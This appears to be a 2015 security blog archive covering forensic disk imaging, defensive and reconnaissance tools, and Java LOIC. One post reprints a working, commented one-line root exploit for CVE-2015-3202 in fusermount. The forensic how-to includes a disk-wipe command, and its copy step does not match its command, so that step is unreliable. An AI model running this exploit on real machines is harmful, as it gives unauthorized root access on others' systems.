May 26, 2015

Howto: Collect data for Digital Forensic

1. Wipe hdd
# sudo shred -v -n 0 -z /dev/sdc

2. Check byte in harddisk that was replaced by 0 or not.
# sudo xxd -a /dev/sdc

3. MD5Sum Source (Evidence)
# sudo md5sum /dev/sdb

4. Copy from evidence (/dev/sdb/) to hdd (/dev/sdc)
# sudo dd if=/dev/sdc bs=512 count=499712 | md5sum
or create image from source
# dcfldd if=/dev/sdb hash=md5 of=/media/diskimage.dd bs=512 noerror

Tools: Loki - Simple IOC Scanner


  • Download the program archive via the button "Download ZIP" on the right sidebar
  • Unpack LOKI locally
  • Provide the folder to a target system that should be scanned: removable media, network share, folder on target system
  • Right-click on loki.exe and select "Run as Administrator" or open a command line "cmd.exe" as Administrator and run it from there (you can also run LOKI without administrative privileges but some checks will be disabled and relevant objects on disk will not be accessible)


  • The resulting report will show a GREEN, YELLOW or RED result line.
  • Please analyse the findings yourself by:
    1. uploading non-confidential samples to
    2. Search the web for the filename
    3. Search the web for keywords from the rule name (e.g. EQUATIONGroupMalware_1 > search for "Equation Group")
    4. Search the web for the MD5 hash of the sample
  • Please report back false positives via the "Issues" section, which is accessible via the right sidebar (mention the false positive indicator like a hash and/or filename and the rule name that triggered)

Tools: vmware-snapcompare - VMware Snapshot Forensic Comparison Scripts

These scripts are derived from the contents of the May 2011 paper "Forensic Analysis of VMware Hard Disks" by Manish Hirwani. The paper was retrieved in March, 2013 from, and a copy is included in this repository.
The files in the "bash.original" directory reflect the closest functional version of the scripts in the PDF. Future feature additions will be made to files in "" directory, and possibly others.
These scripts are not only used for VMware image comparisons, but could help in analysis of any "changed" system images.

Initial Modifications

The originals were modified to function within the SANS SIFT Ubuntu VMware distribution. (See for details and download.) Modifications between the paper and initial commit included:
  • Handling special characters in filenames
  • Use sleep(1) instead of usleep for better portability
  • Move common function and variable definitions to a separate file, sourced as needed
  • Syntax corrections
  • Use mmls(1) from TSK instead of fdisk(8)
  • Paths to binaries to sync with SIFT paths
  • Other minor changes to enable functionality within SIFT environment

Tools: SYWokrs - Wireless Auditing, Intrusion Detection & Prevention System

Wireless Auditing, Intrusion Detection & Prevention System
Depends on PyCrypto, run pip install pycrypto to install. (Removed - Encryption feature)
Youtube Video Playlist -
Blog -
Fans Page -


Tools: SSHAttackFinder - A simple Python script that scans the logfile for attackers failing passwords on your system.

The script automatically saves the "IPs" file to the current working directory (os.cwd()), however why not edit this line, and make the script output to your website's directory? Add the script to a cronjob, and you have a dynamically updating list of possible attackers!
Example line: IPsf = open("/var/www/site/IPs", "w+")
Example Cron Line (crontab -e): 0 0 * * * python3 /home/foobar/

However the person running this file must have access to the directory!
This script only runs on Linux. It may not work out-of-the-box on some distros, that don't use /var/log/auth.log, however change the "auth" line to the applicable logfile, and it should run.


May 22, 2015

Resource for LogJam Vulnerability


(By taviso) Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
# $b is used twice, first to build the contents of shellscript $a, and then as
# a command to make $a executable. Quotes are unused to save a character, so
# the seperator must be escaped.
b=chmod\ u+sx;
# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
# and dont make it drop privileges.
echo $b /bin/sh>$a;
# Now make the $a script executable using the command in $b. This needlessly
# sets the setuid bit, but that doesn't do any harm.
$b $a;
# Now make $a the directory we want fusermount to use. This directory name is
# written to an arbitrary file as part of the vulnerability, so needs to be
# formed such that it's a valid shell command.
# Create the mount point for fusermount.
mkdir -p $a;
# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
# /bin/mount so that it can use privileged mount options that are normally
# restricted if ruid != euid. That's acceptable (but scary) in theory, because
# fusermount can sanitize the call to make sure it's safe.
# However, because mount thinks it's being invoked by root, it allows
# access to debugging features via the environment that would not normally be
# safe for unprivileged users and fusermount doesn't sanitize them.
# Therefore, the bug is that the environment is not cleared when calling mount
# with ruid=0. One debugging feature available is changing the location of
# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
# files.
# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
# current shell from $ it only works if you're using bash!).
# The line written by fusermount will look like this:
# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
# next time root logs in.
# Another way to exploit it would be overwriting /etc/default/locale, then
# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
# wouldn't have to log in, but you would have to wait around until midnight to
# check if it worked.
# And we have enough characters left for a hash tag/comment.
LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 

May 19, 2015

Tools: SQLassie - database firewall

SQLassie is a database firewall that detects and prevents SQL injection attacks at runtime.


SQLassie currently only supports MySQL. To start SQLassie, you'll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.
As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.
First, start SQLassie using
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
Then, edit MediaWiki's configuration file LocalSettings.php connect to port 3307.
$wgDBServer = ""
Note that you can't use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string in order to force connections to go through the TCP port. Check your application's documentation for more information.


Tools: WIG - WebApp Information Gatherer

wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

wig features:
  • CMS version detection by: check sums, string matching and extraction
  • Lists detected package and platform versions such as, php, openssl, apache
  • Detects JavaScript libraries
  • Operation system fingerprinting by matching php, apache and other packages against a values in wig's database
  • Checks for files of interest such as administrative login pages, readmes, etc
  • Currently the wig's databases include 28,000 fingerprints
  • Reuse information from previous runs (save the cache)
  • Implement a verbose option
  • Remove dependency on 'requests'
  • Support for proxy
  • Proper threading support
  • Included check for known vulnerabilities

Tools: Java LOIC - Low Orbit Ion Cannon. A Java based network stress testing application

Low Orbit Ion Cannon. The project is a Java implementation of LOIC written by Praetox but it's not related with the original project. The main purpose of Java LOIC is testing your network.

Java LOIC should work on most operating systems.